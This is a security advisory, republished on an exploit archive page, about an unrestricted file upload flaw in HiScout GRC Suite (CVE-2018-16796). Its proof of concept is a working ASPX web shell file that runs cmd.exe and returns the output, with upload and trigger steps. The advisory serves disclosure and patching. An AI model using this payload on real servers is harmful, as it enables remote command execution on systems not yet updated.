exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HiScout GRC Suite File Upload

HiScout GRC Suite File Upload
Posted Sep 13, 2018
Authored by Sebastian Auwaerter | Site syss.de

HiScout GRC Suite versions prior to 3.1.5 suffer from a file upload vulnerability. An authenticated attacker with the permission to edit or add a "WebSiteElement" to the "content" pages is able to upload any file with any file extension to the data directory of the application. This directory is in the web root and the uploaded file is executed on the server if ".aspx" is chosen as the file extension and if the file contains aspx source code. Any commands can be executed with the permissions of the web server user on the server by exploiting this vulnerability.

tags | exploit, web, root, file upload
advisories | CVE-2018-16796
SHA-256 | 0b70d18c98e2aa3b7c8228963bae5c8015cb59571383b77778ec28287f564e35

HiScout GRC Suite File Upload

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2018-015
Product: HiScout GRC Suite
Manufacturer: HiScout GmbH
Affected Version(s): < 3.1.5
Tested Version(s): 3.1.3.12
Vulnerability Type: Unrestricted Upload of File with Dangerous Type
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2018-07-26
Solution Date: 2018-09-03
Public Disclosure: 2018-09-12
CVE Reference: CVE-2018-16796
Author of Advisory: Sebastian Auwaerter, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

HiScout GRC Suite is a platform for managing IT governance, risk and
compliance.

The manufacturer describes the various modules of the
product as follows (see [1]):

The HiScout ISM module is geared toward meeting the requirements of the
ISO 27000 series of international standards, and provides a reliable
basis for the information management systems control loop.

The HiScout Grundschutz module fully supports operations toward BSI
standard 100-2. HiScout Grundschutz comes geared to BSI specifications
and can smoothly incorporate existing data from other tools, such as
GSTOOL. The HiScout BCM module is a new generation of BCM tools that can
generate quantifiable benefits even when there is no emergency, and is
therefore not only used to help you to plan for circumstances that will
hopefully never arise.

Due to a missing check of the file extension and the content of uploaded
files in place of an image, HiScout GRC Suite is vulnerable to a remote
code execution vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

An authenticated attacker with the permission to edit or add a
"WebSiteElement" to the "content" pages is able to upload any file
with any file extension to the data directory of the application. This
directory is in the web root and the uploaded file is executed on
the server if ".aspx" is chosen as the file extension and if the file
contains aspx source code. Any commands can be executed with the
permissions of the web server user on the server by exploiting this
vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC)

To reproduce this issue on a German instance of HiScout GRC Suite,
choose "Inhalte" -> "Neu" -> "WebSiteElement" (The english equivalent
is "Content" -> "New" -> "WebSiteElement") and upload the following
file to the file upload on the right-hand side of the "InfoEditor":

filename: whoami.aspx
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<html>
<head>
<title>Code Execution PoC</title>
</head>
<body>
<%
String a = "whoami";
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+ a;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
String s = stmrdr.ReadToEnd();
stmrdr.Close();

Response.Write("<li>");
Response.Write(s);
Response.Write("</li>");
%>
</body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Now, either visit the uploaded file by navigating to
http(s)://<vulnerable-server>/<image-directory>/whoami.aspx or open the
page where the newly created "WebSiteElement" is shown and follow the
path of the "image" that is not loaded properly.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to software version to 3.1.5

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-07-25: Vulnerability discovered
2018-07-26: Vulnerability reported to manufacturer
2018-09-03: Patch released by manufacturer
2018-09-12: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for HiScout BCM
https://www.hiscout.com/en/
[2] SySS Security Advisory SYSS-2018-015
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-015.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Auwaerter of SySS
GmbH.

E-Mail: sebastian.auwaerter at syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc
Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJbmQCjAAoJEOmjDUji8Ki2BwQP/2uq786EGw1yi9a3TjG5aQK3
HgLjlYajwpjInpA3I9A40C+udGFfmmTRaMxC9jcWGxae8qwDaFG00fjHmRNWEAK6
6cuMFyBScf1DOmT68GqYKQCm27xmU0iYbPUWbnFHKslKnGLfO7Y4WihfeF/YY+uo
+cBtWtrm3QV5y7xCpnLHFT02FHLBC/84mBI9vqag9ipycxau7ekSu1SkmaOgYwXM
yIpLlVLeoOTbJNJLMVGrs5Dwz6lSlZ5EgB5PS9ANyoNdGvJDfp+8fOegniiePlWL
2heLJt0rchKbxKpAUl7bF9ftJAAOxEhk1SH6xsO/8/VKQNCWwJD0n0GLGWViWHQ8
DhVTGP4BKnlniN9yT6S5WVBD5YikylnmRqBhp8SDrcPNO9xwdol6QmeI7+PEuzlq
ILBnypZEhdU92wAwHY4njQ0MrqDR6R70rgBMk8k+Ep1UZjyGZAeVz74O8hg/pFji
uP2hfzc3XXHFiydK2dEkXiqdhm8GW5ZRtdePCbhvwjQ8osyx8KAVc9eejKWe328s
4IQ83DtZ04fWmD8FflqML1Omdw6Gsq6d+bhnwQUOJfAVzbItiHm+ULBt6l4G/mX6
RNf4aWgkc2nCI26GsEeP3yr6PROQAIoO3qGvAM+p/kwdduSPmyszEMskttL4aM/r
gJzmL3W4B24OGK8xigDk
=GwUf
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close